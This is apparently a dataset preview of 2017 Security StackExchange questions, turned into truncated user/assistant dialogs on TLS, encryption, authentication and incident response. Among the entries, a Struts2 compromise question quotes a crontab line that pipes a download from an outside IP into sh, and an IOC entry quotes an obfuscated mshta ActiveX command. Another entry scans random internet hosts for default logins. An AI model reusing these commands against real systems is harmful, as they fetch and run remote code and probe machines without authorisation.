dialog
listlengths
4
30
title
stringlengths
15
150
category
stringclasses
14 values
dialog_time
stringdate
2016-01-21 01:59:30
2018-07-01 01:34:46
[ { "message": "Suppose I have N users who should be able to decrypt a subset of documents D1...Dk. N is very large and users are often being adding and removed so it is impractical to encrypt a given document Di using all of their public keys.As I've read, a common solution here is to create a group G with its o...
PGP multi-key encryption for large, dynamic groups viewing static documents
security
2017-06-02T22:40:07.327
[ { "message": "Need your suggestion on this.Consider We have a mobile application and massive number of users. We want to implement secure password reset functionality with the consent of user experience.Assumption - Here we all assume that hacker has stolen the phone of victim hence traditional password reset i...
Regarding Forget password security implementation
security
2017-06-03T04:29:52.197
[ { "message": "Are all challenge-response (or other authentication) protocols vulnerable to on-line main-in-the-middle attacks? Let's say Alice wants to setup a connection with Bob (e.g. she wants to login on a server). Bob sends her a random number, r. Alice then replies with a MAC of the random number, using h...
Vulnerability of challenge-response (authentication) protocols to on-line man-in-the-middle attacks
security
2017-06-05T11:43:52.190
[ { "message": "How many different passwords should I use for my ArchLinux laptop that I'll be carrying around all the time ? Here are the services I could need a password for :Full disk encryptionUser loginRoot loginPassword manager encryptionBackup encryptionBIOS PasswordGRUB PasswordIs it safe to reuse the sam...
How many different passwords for a Linux System?
security
2017-06-06T10:21:29.553
[ { "message": "Heroku got interesting <a href=\"https://blog.heroku.com/sunsetting_heroku_s_legacy_platform_api_v2\" rel=\"nofollow noreferrer\">blog post:<blockquote> For security reasons, we will be sunsetting support of auth in query string sooner, which we will announce in the Changelog. </blockquote>Howeve...
Auth in query string
security
2017-06-07T11:08:05.323
[ { "message": "Are digital certificates part of TLS protocol implementation? Is thepadlock green icon on my browser has to do with TLS use or digitalcertificates?If I use a service like Let's Encrypt to issue a certificate for my web server, how can I determine the TLS version used?Thank you", "role": "user...
What is the difference between SSL\TLS vs certificates?
security
2017-06-07T18:26:01.723
[ { "message": "I'm developing a social network and to my knowledge, the best way of storing between pages which user is logged on is using cookies. So, suppose I'm storing a cookie of the user ID which is logged in.Anyway, what's stopping the user from changing the cookie's value in order to trick the website in...
What's stopping people from modifying cookies to change who they're logged in as?
security
2017-06-07T19:01:40.533
[ { "message": "I would like to host a service (written in <code>C#</code>) on my server and allow it to be accessed from outside the network. I know that I need to open a port in the firewall for this to work, and I managed to do this, but I have no idea how safe this is.Is anyone able to advise on what basic pr...
Security considerations when opening port for a service?
security
2017-06-08T12:54:19.357
[ { "message": "Is it possible to tell an antivirus which specific virus type (worm, macro etc) to scan for? Assuming I know the type of virus and just want to save time and scan for it specifically instead of running it though the whole system.", "role": "user" }, { "message": "It is not possible wit...
Scan for a specific virus type?
security
2017-06-08T20:18:00.210
[ { "message": "During today's apps update, ORBOT update asks for aditional permissions: a) photo/media/files, and b) Device ID and caller information.(Android 5.0.1, current ORBOT (pre-update) 15.2.0-RC-8-multi)Why would an app, with the main purpose of providing anonymity, actively request permission to access ...
Is Orbot android TOR client compromised (permissions to device ID and caller information)?
security
2017-06-08T22:05:58.103
[ { "message": "How to make a program that calculates a checksum of a file? What is the exact process of calculating a checksum?", "role": "user" }, { "message": "Checksums are simply numbers that help verify that a particular set of data (a file, for example) is unchanged from the last time it was ch...
How can I make a program to verify file integrity?
security
2017-06-10T03:29:33.887
[ { "message": "Lets say I go to some hotel, the hotel has a WIFI network that requires as password and/or username to access. Can other hotelguests then see my wifi traffic if they are not logged in to the wifi, and can they see it when they are connected to the WIFI as a guest like me..but not as the network ad...
Can other WIFI users see my network traffic?
security
2017-06-10T18:27:38.977
[ { "message": "I've been practicing shell coding on Linux for a while. I used a VM to develop and test my shell code. The VM ran inside VMware workstation 12 pro, on Windows 10. Everything was fine and I could use the usual int 0x80 to switch to kernel mode until now. Just recently​, I upgraded my windows 10 fr...
C library functions in statically linked ELF32 binary no longer use int 0x80
security
2017-06-10T18:58:23.653
[ { "message": "I am currently defining a PKI for code signing certificates on an embedded device (without internet connection). I define the behavior of the certificate issuer(FW release authority) as well as the FW code which will authenticate the certificate of the public key used to sign it upon FW update, I ...
What's the common strategy for issuing OCSP requests
security
2017-06-11T08:59:35.183
[ { "message": "SVG files are susceptible to <a href=\"https://en.wikipedia.org/wiki/Billion_laughs\" rel=\"nofollow noreferrer\">billion laughs attack. Our website allows users to upload/submit markdown files and we run the .md file through marked.js before rendering it. Now images in the markdown get rendered a...
SVG files and billion laughs attack
security
2017-06-11T18:34:16.187
[ { "message": "I want to verify whether wireshark can decrypt HTTPS traffic or not when DHE is used for key exchange. For the same reason, I want to access some application or website which uses DHE for key exchange. I am unable to find one.Are there any Linux-based applications or websites which use DHE for key...
Example of application / website that use DHE for key exchange?
security
2017-06-12T16:32:16.410
[ { "message": "I would like to be proactive and disable weak ciphers on my web servers, such as TLS_RSA_WITH_3DES_EDE_CBC_SHA. However I am concerned with inadvertently cutting off users who make use of older system. Is there a good resource only that provides statistics on the current % of browser users who req...
Resource for determining the ramifications of disabling various ciphers
security
2017-06-12T21:35:45.890
[ { "message": "I have been asked to implement disk encryption on a machine that needs to be able to run unattended. The machine has two disks. The first disk has a boot partition and an OS partition, while the second disk only has one partition and is used for storage for an application. The goal is to protect t...
Unattended Disk Encryption
security
2017-06-14T15:07:56.087
[ { "message": "How do I find out if someone who had access to my laptop, accessed the hard drive manually (by taking it out of the laptop and copying or viewing the data)?I know there is the Windows audit policy for actual log-ins, is that reliable to know if someone accessed your hard drive without removi...
Has the hard drive been accessed or computer hacked?
security
2017-06-14T22:34:43.667
[ { "message": "I have 2 virtual machines. (Vmware esxi 6)They are both opensuse 42.3 (tumbleweed)Firewall (iptables,ipset,dhcpd,dns only)mail/web server. (apache,dovecot,postfix)The web server can not communicate with the firewall, except that the traffic passes through it to reach the mail/web server.The firewa...
What is the most secure communication between firewall, and DMZ
security
2017-06-15T18:00:38.300
[ { "message": "ESP32 and ESP2866 devices are very famous as cheap IoT controller and connect via wireless LAN. Unfortunately the firmware of these devices is still closed source and quite large. It is there any chance to detect, if malicious software is shipped in the firmware, which opens backdoors or harms the...
How to detect, if ESP32 or ESP2866 IoT devices hide malicious in their firmware?
security
2017-06-15T19:12:29.770
[ { "message": "After a TLS-enabled server generates a message digest (HMAC), does it sign the digest using the private key of an asymmetric key pair, forming a digital signature? I'm more interested in knowing whether most of the TLS 1.0/1.1 web servers do it in production environment, rather than whether an RFC...
Does TLS 1.0/1.1 server sign the message digest with its private key?
security
2017-06-16T21:15:50.683
[ { "message": "In an ideal world, where all links are fully trustworthy from a data integrity point of view, with proper settings, modern SSH can be more or less assumed to be fully secure against eavesdropping on the content of the communications, but may leak metadata (e.g. the fact that you are connecting to ...
How is the security of SSH affected in the presence of a passively monitoring MITM?
security
2017-06-18T14:29:19.473
[ { "message": "I discovered the newer <a href=\"https://en.wikipedia.org/wiki/OpenSSH\" rel=\"nofollow noreferrer\">OpenSSH format for storing SSH private keys (<code>ssh-keygen -o</code>) uses <a href=\"https://en.wikipedia.org/wiki/bcrypt\" rel=\"nofollow noreferrer\">bcrypt to generate the <a href=\"https://e...
What does ssh-keygen's -a option really mean?
security
2017-06-19T07:40:02.970
[ { "message": "With the Symantec-Google drama, it would help to know if the Internet Explorer browser has its own root trust store built in to the browser, or uses the <a href=\"https://mssec.wordpress.com/2013/01/31/which-root-cas-do-you-really-trust/\" rel=\"nofollow noreferrer\">automatically updating Windows...
Is the windows root trust store used by IE?
security
2017-06-19T22:39:08.990
[ { "message": "Hashcat boasts its ability to crack over 200+ hashing algorithms, but there isn't much documentation on much of them. <code>Hashcat --help</code> shows it has support for HMAC cracking, but its not very straightforward with the syntax (it just says \"1450 | HMAC-SHA256 (key = $pass)\" ). I underst...
Using Hashcat to crack HMAC-SHA256
security
2017-06-20T05:35:34.583
[ { "message": "I'm trying to understand ROP and struggle with the following two questions:I'm often reading that ROP bypasses ASLR and DEP. While it's clear to me ROP is a perfect way to avoid DEP, I don't see how it's bypassing ASLR. Is it because the code section is not randomized?I'm also reading a lot about ...
Return oriented programming (ROP) - Why does it bypass ASLR and what are pop/pop/ret for?
security
2017-06-20T07:40:46.670
[ { "message": "If I cut existing files into the encrypted Verascrypt container, do I still have to securely wipe the files, or is it a bad idea and better to just copy them and then wipe? What software should I wipe the original files with if that's better?", "role": "user" }, { "message": "TLDR: Yes...
Verascrypt wipe
security
2017-06-21T00:58:55.667
[ { "message": "While doing an internal pentest (a red team exercise basically) I figured out the following components of a private key (to be exact OpenSSLRSAPrivateCrtKey):ModulusPublic exponentPrivate exponentFirst primeSecond primeFirst exponentSecond exponentCoefficientNow is there a way to reconstruct the w...
getting the private key from modulus
security
2017-06-21T14:01:16.730
[ { "message": "On my home network, I have a headless mini-mac that I use as a media, plex and security cameras server. I had screen and file sharing enabled, so that I can control it from my regular iMac, since no mouse, keyboard and screen is connected to mini-mac. It is connected to my home wifi and also to my...
How can trace if someone successfully remotely accessed my Mac?
security
2017-06-21T19:57:49.127
[ { "message": "I've seen it mentioned a number of times here that an approach to preventing forced password changes from being changed to trivially similar passwords (eg, <code>mysecurepassword1</code> gets changed to <code>mysecurepassword2</code> and so on) is to hash multiple variations that can be later comp...
What are the security implications of storing multiple hashes for similar passwords?
security
2017-06-22T14:34:48.540
[ { "message": "My use-case is the following:I have dyndns set up to access my home server from the internet. If I use a <a href=\"https://en.wikipedia.org/wiki/Domain-validated_certificate\" rel=\"nofollow noreferrer\">DV certificate or a self-signed certificate I'm not actually authenticating the machine but on...
Can I somehow require a specific certificate for a domain?
security
2017-06-23T15:49:04.383
[ { "message": "My wife and I got into a discussion about the security of our home WiFi the other day, so I have come to this discussion board to see if I am wrong about how secure I/we feel. We have your normal home WiFi that is password protected, router config page is locked down with (non-default) username/pw...
How vulnerable are devices on my home WiFi?
security
2017-06-23T22:18:03.123
[ { "message": "I am studying IDPs and I would like to know where network-based IDPS sensors can be placed in the segments of the network of the university organization. I am looking forward to analyse different scenarios of sensor placements and the benefits for each one. Can anyone give a suggestion? Thanks in ...
NIDS sensors placement in the network of an organization
security
2017-06-23T23:31:41.180
[ { "message": "How would a DMZ zone recertification process look like? Say we create a separate security zone for each application hosted in DMZ. Now we would like to get in touch with the person in charge for the given zone to ask if it's still needed. How could this be handled? Are there any ISO 27001 directiv...
Internal process to recertify DMZ zones
security
2017-06-26T08:57:06.750
[ { "message": "In the Annex C of ISO/IEC 27005 typical threats are described, among others eavesdropping and remote spying. When searching on the internet for further description of the two terms I found them used synonymously. So why are the two listed separately?", "role": "user" }, { "message": "E...
What is the difference between 'Eavesdropping' and 'Remote Spying' in ISO/IEC 27005?
security
2017-06-26T09:31:45.707
[ { "message": "PGP key holders occasionally replace their old PGP master keys with newer PGP master keys (for example, to use securer algorithms).When doing this, PGP key holders want their new key to be signed by the same people who signed the old key.There's a few documents that describe how to do this:<a href...
What's the purpose of a PGP transition statement?
security
2017-06-26T12:41:41.647
[ { "message": "I have an application that escapes the following special characters.<pre><code>&amp; &lt; &gt; \" '</code></pre>The application heavily displays HTTP request parameters throughout the application. The request parameters are used in the HTML body, div tags, even within the Javascript <code>&lt;scri...
Is this filter safe enough to mitigate XSS?
security
2017-06-26T21:38:49.823
[ { "message": "GoalsI am implementing a web-based system which has the following goals:Users are able to store secrets (could be password, or an entire file) on the server.Server has no knowledge of the keys for decryption. So that if the server is compromised, the attacker would not be able to decrypt the secre...
Is this design for storing/sharing secrets secure?
security
2017-06-27T00:11:32.237
[ { "message": "Can someone help understand what exactly is being done through this attack.I was using Struts2.3 in Jboss5 environment.I had some crontabs installed, which went missing instead these two lines are seen in crontab.<pre><code>#*/20 * * * * wget -O - -q http://91.230.47.40/icons/logo.jpg|sh#*/19 * * ...
Struts2.3 Zero Day attack exploited: CronJob getting created
security
2017-06-27T04:53:24.550
[ { "message": "I'm performing an university project on malware detection. Specifically I need: <pre><code> - extract javascript from a PDF, - put it in the right order, ...
PDF parser and OPcodeExtraction
security
2017-06-29T10:26:31.343
[ { "message": "Accidentally I sent my nude images through Grindr while using the company wifi network. I sent these photos from my personal iPhone. Can they see these photos or only that I used the Grindr ? Should I worry ?", "role": "user" }, { "message": "Assuming Grindr uses HTTPS (I'm not about ...
Posted images at company wifi network by accident. I used my personal IPhone
security
2017-06-29T19:53:39.657
[ { "message": "I was installing a CA on a Windows server 2012 machine, and it asked what hash algorithm I want to sign the certificates with (MD5, SHA1, SHA256, etc). I read that SHA256 is immune to collision attacks while older methods are not. From what I understand the CA uses this hashing algorithm to create...
What does a collision attack accomplish for an attacker?
security
2017-07-01T17:33:51.630
[ { "message": "I've been learning more about XSS (for the unfamiliar, <a href=\"https://excess-xss.com/\" rel=\"noreferrer\">Excess XSS is a great resource). I opted to get my hands dirty and give Reflected XSS a try on a local environment. I set up a very simple vulnerable PHP page running on Apache2 which take...
Is reflected XSS still relevant today?
security
2017-07-02T08:07:54.567
[ { "message": "I wonder about the benefits of the following ciphers:TLS_ECDHE_PSK_WITH_NULL_SHA256 TLS_ECDHE_ECDSA_WITH_NULL_SHAWhy should I go for perfect forward secrecy if I don't want to encrypt in the first place? I just want to go for Authenticity/Integrity..Why are those ciphers even listed in the registr...
What are TLS Cipher Suites with ephemeral key Exchange and NULL encryption for
security
2017-07-03T12:03:02.427
[ { "message": "As I understand it, the Logjam TLS attack is an attack that downgrades the DHE cipher suite used by the server to DHE_EXPORT. Where the client thinks it is talking DHE 512 and the server things it's talking DHE_EXPORT (which is 512 but with a different name?).It is not possible to downgrade to a l...
Logjam definition question
security
2017-07-03T13:14:03.990
[ { "message": "Having seen <a href=\"https://security.stackexchange.com/questions/40414/tor-via-python-can-the-real-ip-address-leak\"><a href=\"https://security.stackexchange.com/q/40414/\">Tor via Python - can the real IP address leak? I am no longer sure whether or not using<blockquote> curl -L --insecure -C ...
Can the real IP address leak using curl via Tor?
security
2017-07-03T17:55:48.387
[ { "message": "I have a snapshot of the memory of a device loaded up in FTK Imager.I also have a file, specifically a picture (JPG) as a file on my computer. I know for a fact that this file is present in the memory snapshot, but it is split in several different fragments (about 80 of them).Each segment is exact...
How to look up a file that has been split into segments in a memory snapshot
security
2017-07-06T01:24:59.813
[ { "message": "I have a 4 TB external hard disk with 200 GB files on it. I started the encryption process with Bitlocker, but it is taking too long.Can I pause the encryption process, move the 200 GB from the drive to empty it and then resume the encryption process? Will the encryption process, the drive or the ...
Removing files from drive while encrypting with Bitlocker
security
2017-07-07T08:12:46.253
[ { "message": "I would like to know your opinion about the following:I´m developing an Android messenger, where all communication goes from the app -> php -> mysql, from where it will pulled by the receiver in opposite order.So I´ve been thinking about how to make it secure, and thought about the following:First...
Safe messenger encryption
security
2017-07-07T11:19:43.430
[ { "message": "We are currently using Apache Shiro for our User Authentication needs. We have dynamic authorization\\authentication needs, in some cases users will be authenticated using Active Directory while some will be authenticated using JDBC, but all users will be authorized using JDBC.Shiro has proven up ...
Self-Coded User Authentication Security
security
2017-07-07T12:04:36.877
[ { "message": "I regularly use <a href=\"https://web.archive.org/\" rel=\"nofollow noreferrer\">Wayback Machine to help find archived versions of webpages that have been taken down or are other otherwise unavailable.While using the site, I noticed a peculiar warning in Google Chrome's address bar.<a href=\"https...
Should I be concerned about Wayback Machine trying to load scripts from unauthenticated sources?
security
2017-07-08T16:49:49.823
[ { "message": "Someone uploaded (I don't know how how but I think via my Wordpress which was outdated for just a day...) a Google Search Console authentication to my server. I just realized this because Google Search Console sent me a mail about a new authentication to a script-generated email account (many numb...
Why would an attacker authenticate to my Google Search Console?
security
2017-07-10T10:03:42.127
[ { "message": "I received this email from Google (translated from my native language):<blockquote> We have got the request to access to your Google account using email address. Your code is XXXXXX.</blockquote>Does it mean that somebody already has my password and all that he needs is second factor (code)?", ...
Has my Google account been compromised?
security
2017-07-10T18:33:20.403
[ { "message": "I have a IOC that has a command line argument that looks like this below. Wanted to see if someone could help me parse it out a little bit to understand what is happening.<pre><code>C:\\Windows\\System32\\mshta.exe javascript:GO3sOtu=BN1;Z0y=new%20ActiveXObject(WScript.Shell);Aer53IGv=BY5S;Quaj7=Z...
How to read command line argument for potential issue
security
2017-07-10T21:02:07.083
[ { "message": "How can i improve this by passing arguments to <code>http-default-accounts.</code>I feel like I'm doing something wrong. I'm not getting any good results<pre><code># Find vulnerable web logins# How many random hosts do you want to scan ?N_HOSTS=5000nmap\\ -Pn\\ -sS\\ -sV\\ -n\\ -T5\\ -p 8080, 80, ...
How do i use nmap NSE script arguments
security
2017-07-11T06:21:44.107
[ { "message": "A couple of days ago I have registered a new domain on GoDaddy without WHOIS privacy option. The next day after registration I have started receiving spam in my mailbox as well as on my phone. The domain is dormant in the sense that it is not used in any way at the moment i.e. it has no valid NS, ...
Receiving lots of spam after registering a new domain on GoDaddy
security
2017-07-11T16:17:20.377
[ { "message": "I have an internet connection that is soon rolling out IPv6 native support but my VPN connection is far from rolling out IPv6 connection. Can there can be any sort of leak if I still connect to my VPN while my ISP gives me an IPv6 address. Moreover, how are the packets encapsulated in IPv6 packets...
My ISP provides IPv6 natively but my VPN does not support IPv6
security
2017-07-11T16:26:42.890
[ { "message": "In his excellent answer to \"<a href=\"https://security.stackexchange.com/questions/64294/how-does-a-sim-card-prevent-cloning\">How does a SIM card prevent cloning?\", user Lie Ryan explains that SIM cards have their critical data stored in \"tamper proof housing\", protected by \"physical securit...
What are the physical security features that prevent the cryptographic data on a SIM card being read?
security
2017-07-11T17:39:40.233
[ { "message": "I am trying to generate a password list to retrieve a password I have forgotten. The task is fairly simple, but I had no chance to find a solution on Google. So here is the problem:I know the password consists of several words (without spaces), and I know the exact word order:<pre><code>word1word2...
Need help writing code to brute-force a password that I partially forgot
security
2017-07-11T20:30:20.863
[ { "message": "Are there some dataset (set of benign files) that are good for testing false positive of an antivirus? (i.e., detect a benign file as malicious)", "role": "user" }, { "message": "You may want to take a look at this one:<a href=\"http://www.eicar.org/86-0-Intended-use.html\" rel=\"nofol...
Dataset for testing false positive of antivirus
security
2017-07-12T09:47:38.260
[ { "message": "I have one website in chromium tab, and an other website in another tab,Im executing single post command in the second website - $.post(...); to the first website.Originaly its not working (getting: \"No ‘Access-Control-Allow-Origin’ header is present on the requested resource. Origin ‘null’ is th...
what prevents sending "$.post" from one domain to another?
security
2017-07-12T22:55:49.810
[ { "message": "Is it possible to override parent folder .htaccess rules with child php.ini or some other file except .htaccess?What I have is:<pre><code>/var/www/site/static/.htaccess/var/www/site/static/abc//var/www/site/static/abc/def/(I have access to this)</code></pre>I have access to <code>def</code> folder...
Override parent .htaccess with php.ini?
security
2017-07-14T03:41:00.223
[ { "message": "I clicked on a link (indistannews.com) and was redirected to a different website (sexiniowa.com). [Warning - the latter site is a pornography website].I looked at the transaction in Wireshark to try and see how I was redirected. All I see is a 3-way TCP handshake initiated by my client to the orig...
Trying to examine URL redirection in Wireshark
security
2017-07-15T05:44:05.117
[ { "message": "This is what a casual <code>IKEv2</code> handshake looks like :<pre><code> Initiator Responder | | 1|-----------------------&gt; HDR, SAi1, KEi, Ni -------------------------...
Key exchange during IKE_AUTH phase of IKEv2
security
2017-07-15T15:35:52.053
[ { "message": "Our internet policy blocks so-called 'parked' websites, i.e. those that are registered but do not seem to be active. I'm not sure what tests are used to determine parked status.There is a tool that my team is looking to use but some of the documentation is on a domain that our filter software has...
What risks are associated with 'parked' websites?
security
2017-07-17T14:28:02.613
[ { "message": "If I sign an executable with an authenticode certificate will any A/V stop flagging it as a virus?", "role": "user" }, { "message": "Authenticode will most likely help to bypass human check, as the victim has more chance to accept the execution of an application flagged as coming from ...
Authenticode Certificate to avoid A/V
security
2017-07-18T16:26:23.527
[ { "message": "I travel for work a lot and need to use a VPN on my personal laptop over open hotel wifi. I have a browser based VPN extension as well as a network based VPN with a connection to my university's network. What are the differences between a browser based VPN (in the form of extension for example) vs...
Browser based VPN vs network based VPN
security
2017-07-19T00:09:41.353
[ { "message": "As far as <a href=\"https://en.wikipedia.org/wiki/Petya_(malware)\" rel=\"nofollow noreferrer\">Wikipedia has provided information, I understood, that the Petya malware was disguised as a PDF file, which the target machines were attempting to open.Assuming this is the case, did the victims really ...
About the Petya cyberattack: How exactly did the cyber attack unfold?
security
2017-07-20T06:51:08.500
[ { "message": "After installing Firefox 54.0.1 on my work laptop, the first page I see warns me that \"Your connection is not secure\" when opening <a href=\"https://www.mozilla.org/en-US/firefox/54.0.1/firstrun/\" rel=\"noreferrer\"><code>https://www.mozilla.org/</code>.<a href=\"https://i.stack.imgur.com/91zK0...
Why is Firefox (and only Firefox) reporting that my connection is insecure on multiple sites?
security
2017-07-20T15:04:55.770
[ { "message": "I have a requirement of OTP applications on mobile devices not sharing the same secret (even if the mobile devices are owned by the same user). A single secret must be present in a single device.Open source applications that implement OTP (like Google Authenticator and FreeOTP) do not satisfies my...
Prevention of devices using same OTP secret
security
2017-07-20T15:25:56.893
[ { "message": "I am interested in learning how to get into a network and then intercept and modify traffic and am looking to get a WIFI adapter that will let me use the tools in Kali Linux. I have done some research but I am having trouble finding something that has a supported chipset. I run Kali in a VirtualBo...
Good starter WiFi adapter under $30 for experimenting with Kali Linux
security
2017-07-20T16:03:32.237
[ { "message": "Suppose I want to use EAP-TLS or EAP-MSCHAPv2 for 802.1x authentication for my wireless network users who are not part of my domain. Is there any way to make your CA trusted by the users other than to manually put it in the trusted store of every single device?", "role": "user" }, { "m...
How do you put your own CA into the trusted root CA store of users who are not members of your domain?
security
2017-07-20T16:49:01.083
[ { "message": "I do only banking with my \"PostFinance\" debit card. The sign-in protocol works like this:Enter user name and password into web form.Get a 9 digit challenge number on website.Type the challenge number into an offline standalone card reader with the debit card inserted.Enter PIN into card reader.G...
How can a debit card provide different answers when the same challenge is sent to it multiple times?
security
2017-07-20T20:13:44.110
[ { "message": "There are many questions on this site from users finding out that their employer has a certificate proxy in place, essentially implementing a man-in-the-middle attack so that all traffic is able to be decrypted.I've been told from our security professional who put it in place that this policy is c...
Is implementing an SSL proxy server considered a good practice?
security
2017-07-21T01:25:41.143
[ { "message": "The <a href=\"https://en.wikipedia.org/wiki/Honeypot_(computing)\" rel=\"nofollow noreferrer\">honeypot wikipedia article states:<blockquote> ...a honeypot is a computer security mechanism set to detect, deflect, or, in some manner, counteract attempts at unauthorized use of information systems.<...
Can a honeypot really deflect damage back to the attacker?
security
2017-07-21T09:24:12.607
[ { "message": "I recently made a purchase from a merchant (the city of Los Angeles). During the checkout process on their web site I had to enter my credit card information. One of the fields in the credit card form was labeled \"Card Present\". It was a checkbox which was checked and disabled meaning that I cou...
Is it normal for a merchant to claim an online transaction is card-present?
security
2017-07-22T03:16:34.260
[ { "message": "As the question says, can anybody give insights on how anti phishing works in <a href=\"https://www.google.com/transparencyreport/safebrowsing/diagnostic/\" rel=\"nofollow noreferrer\">Google Safe Browsing?Does it just use a database of detected phishing URLs or does it use any heuristic?", "r...
How Anti Phishing in Google Safe Browsing works?
security
2017-07-22T16:56:46.267
[ { "message": "Given that there are many password sniffing MitM scripts out there that comb traffic for key-phrases like \"pass\" and \"password\".Why do manufacturers keep the same variable names and make it easy for the attackers? Surely the manufacturers (of routers, etc...) could use the variable \"pass\" in...
Why do login forms still use 'name = "pass"' or similar?
security
2017-07-23T09:39:38.067
[ { "message": "A key/fingerprint change occurred on a friend's server to which I have access. So I text him and ask, \"Did you change the certificates?\" upon which he answer \"Yes\".My initial thought is then to update my local fingerprint, but then it occurred to me: What if someone does a MITM attack simultan...
MITM during legitimate key/fingerprint change
security
2017-07-24T13:52:48.913
[ { "message": "In Citizenfour, Edward Snowden says:<blockquote> Because some of these documents are legitimately classified, in ways that could cause harm to people and methods... Um, I'm comfortable in my technical ability, uh, to protect them. I mean, you could literally shoot me or torture me, and I coul...
Not disclosing the password when tortured?
security
2017-07-25T18:14:11.290
[ { "message": "Let's suppose I'm on the internet all day long. Let's suppose I listen to talk show radio programs over the internet using a media player, something like Win Amp. Am I protected from a browser hijacking as long as my browsers (Firefox, Internet Explorer and Chrome) are closed down? Is it safe to a...
Browser HiJacking Defense?
security
2017-07-26T18:41:08.303
[ { "message": "What is the difference between a security goal and a security aspect ? I know about the three network security goals Confidentiality, Integrity and Availability. But I do not know much about security aspects.", "role": "user" }, { "message": "When you look at something from a security ...
Security aspect vs Security goal
security
2017-07-26T23:25:26.893
[ { "message": "I'm sorry if this is a noobish question. If you have some cisco switch connected to d-link wireless access points, which acts as the Radius client?", "role": "user" }, { "message": "Whichever is acting as the \"Authenticator\" (<a href=\"https://en.wikipedia.org/wiki/IEEE_802.1X#Overvi...
In a wireless network which is the Radius client, the switch or the wireless access point?
security
2017-07-28T17:34:42.110
[ { "message": "I'm learning about encryption and SSL certificates and I'm wondering: If an encrypted connection is used when connecting to a website using a SSL certificate, how can ISP/company manager/government (whoever controls the network traffic) block some specific content of that website?. I know from thi...
How can ISP's block a website specific content while using encrypted connection?
security
2017-07-30T14:01:39.217
[ { "message": "I know how to configure OpenVPN and that there are control and data channels. But I did not yet find a nice overview of the crypto processes and especially how keys and certificates are really used in OpenVPN.I wonder if it's possible to e.g. have an ECC server key and still enforce an RSA TLS cip...
Can key cipher and TLS cipher differ in OpenVPN?
security
2017-07-30T14:18:36.503
[ { "message": "I want to keep a count of how many certificate warnings have been made in the browser over a period of several weeks. I also want to keep track of whether the user ignored these warnings and just clicked through them. Any ideas on how I could do this? Any plugin out there which extracts such stati...
How can I programatically keep track of number of certificate warnings in browser?
security
2017-07-31T21:49:21.010
[ { "message": "Today, the owner of the rather popular <a href=\"https://github.com/chrispederick/web-developer/\" rel=\"noreferrer\">Web Developer toolbar <a href=\"https://twitter.com/chrispederick/status/892768218162487300\" rel=\"noreferrer\">noticed it had been hijacked and replaced with a malicious version....
What are the effects of the Chrome Web Developer extension hijack?
security
2017-08-02T15:56:42.337
[ { "message": "I have a vpn, if I connect it and create an email account while connected to the vpn, and then send the email to the desired recipient, what other levels of protection/anonymity am I missing? I use PIA (Private Internet Access). I have the kill switch on as well so if the VPN disconnects, it will ...
How can I send an email from my laptop anonymously?
security
2017-08-02T16:13:12.637
[ { "message": "If for example I connect to PIA VPN, and I hover over the icon on my toolbar, next to the volume, wifi, and battery symbol on a mac, it shows me one ip address (IP A) that is different from my actual IP (IP O). When I go on PIA's website, it shows me a separate IP address (IP B) however it says I ...
Why is my IP address different when I connect to a vpn?
security
2017-08-02T16:54:04.847
[ { "message": "So user A has a huge text that needs to be encrypted and send to user B. User A creates a symmetric key for AES and encrypts the messages with that AES key. Then, user A encrypts the AES key with the public RSA key of user B and sends both to user B. User B decrypts the AES key with the private RS...
AES, RSA and man in the middle
security
2017-08-02T19:46:52.863
[ { "message": "At my work, there is a wireless network that is on the same subnet as the servers, printers and user machines. This wireless network allows users to have access to shared network drives as if the users were on the LAN. The wireless network is given out to guests that come to the company for any pe...
Guest wireless network is directly connected to internal LAN. How bad is this?
security
2017-08-03T02:08:19.997
[ { "message": "Having just upgraded our FTP server to enforce Explicit FTP over TLS (on the standard port 21), we are experiencing connections failing sporadically, probably around 50% of the time. It's important to note that plain-text FTP is still run for one or two accounts that cannot support FTPS yet with t...
IDP Explicit FTPS False-Positive - "FTP Cmd Telnet Opcode Evasion"
security
2017-08-03T07:47:04.343
[ { "message": "I am testing an application, and come across a GET request that returns sensitive info in the response body. (CSRF token to be validated for next request). Since it is a GET request, developer skipped CSRF protection for all the GET requests and only applied to POST or state changing requests. Tha...
Is it possible to read the response of HTTP request without XHR?
security
2017-08-03T08:37:06.350
[ { "message": "I have a stateless webapp that uses a JWT token. Eventually it will expire - which is OK, but I don't want it to expire while the user is working. Instead, I would like the token to expire after a certain time of inactivity.Let's say my token is valid 60 minutes, Is it ok to send a new JWT on ever...
JWT: A solution to let the token expire after a certain time of inactivity?
security
2017-08-03T14:57:38.203
[ { "message": "For those who had windows computers when the WannaCry virus hit, how exactly did the virus bypass antivirus programs. I have tried to read some papers about this, but I don't understand how exactly that windows hole helped the virus evade antivirus software. Is this just a matter of people not hav...
How did Wanna Cry get past Antivirus Programs
security
2017-08-03T22:00:12.517
[ { "message": "Recently I am learning about thick client application pentesting and have found that it is hard to get a tool for intercepting thick client application traffic.Has anyone come across a thick client application for pentesting, or know whether there is any software that can work as an interceptor pr...
How to intercept thick client application traffic (tcp or http[s])
security
2017-08-04T04:04:42.310
[ { "message": "Recently I am learning about thick client application pentesting and have found that it is hard to get a tool for intercepting thick client application traffic.Has anyone come across a thick client application for pentesting, or know whether there is any software that can work as an interceptor pr...
How to intercept thick client application traffic (tcp or http[s])
security
2017-08-04T04:04:42.310
[ { "message": "Target isolationAttacks like TEMPEST seems to work well but what happen if you are one meter away with two or more computers on, let's say the same table ?I suppose that the recording device will capture all the electronic emanation from all the device where the target is, so if two other running ...
Limitations of electromagnetic emanations techniques (such as TEMPEST)
security
2017-08-04T07:47:08.467
[ { "message": "I read about this <a href=\"https://www.devever.net/~hl/nosecuresmartphone\" rel=\"nofollow noreferrer\">here. If I understand this correctly, it states that a smartphones could get compromised via it's baseband chip and it's (potentially) unsafe and closed-source firmware.I also read <a href=\"ht...
Is it true that smartphones could get compromised via their baseband chip?
security
2017-08-04T13:48:38.263